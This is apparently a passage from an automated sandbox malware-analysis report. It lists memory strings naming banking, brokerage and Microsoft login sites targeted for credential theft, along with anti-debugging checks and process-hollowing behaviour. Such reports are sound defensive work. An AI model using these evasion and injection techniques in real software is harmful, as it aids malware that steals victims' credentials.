                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Aiymwhpj.PIF, 0000000C.00000002.2250088651.000000000083E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757186575.000000001A506000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3755893990.0000000020802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Aiymwhpj.PIF, 00000010.00000002.2330117639.00000000007C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Windows\SysWOW64\brightness.exeAPI call chain: ExitProcess graph end nodegraph_7-25744
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifAPI call chain: ExitProcess graph end nodegraph_10-85857
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFAPI call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifAPI call chain: ExitProcess graph end node
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CF024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,7_2_027CF024
                  Source: C:\Windows\SysWOW64\brightness.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25037A28 LdrInitializeThunk,10_2_25037A28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8798 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_027C8798
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040ADB0 GetProcessHeap,HeapFree,10_2_0040ADB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E61C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00416F6A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004123F1 SetUnhandledExceptionFilter,10_2_004123F1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040CE09
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040E61C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00416F6A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_004123F1 SetUnhandledExceptionFilter,15_2_004123F1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Windows\SysWOW64\brightness.exeMemory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write
                  Sample uses process hollowing technique
                  Source: C:\Windows\SysWOW64\brightness.exeSection unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\brightness.exeMemory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 2BA008Jump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 321008
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 314008
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxs\!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\&
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx]t
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx^V
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@z.!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8[j!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\0
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTDI!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\%^
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\.
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\)
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt+Z!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\&J
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpN`
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\%h
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0aM!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`O[!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd6]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q< H!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@hJ!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd6g
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\O
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd7I
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx__
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\J
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\5
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd_r!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4]8!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$DW!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\2
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\<
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\:
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\e
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0O,
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\c
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXD;!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8_;
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\n
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHbg!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\l
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDx.
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|H^!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\X
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPoG!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\V
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL'E!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 7i!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\[
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\#s
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\$U
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpLu
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,v`!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHB$!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\u
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX2W!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd4r
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd5T
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0>f!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\|
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\z
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8cv
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX$
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|ZB!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,Ks
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX+
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$=,
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,LU
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX(
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX&
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8KF!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 4R
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 3p
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDVX!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@tu
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP'7!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 9)!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd<!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4\r
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX#4
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(De
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHRC!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4]T
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\+=
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXA
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|lB
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX>
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8ea
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXL
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxW(!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhD0
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXJ
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX4
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpT?
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\,-
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,M^
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX2
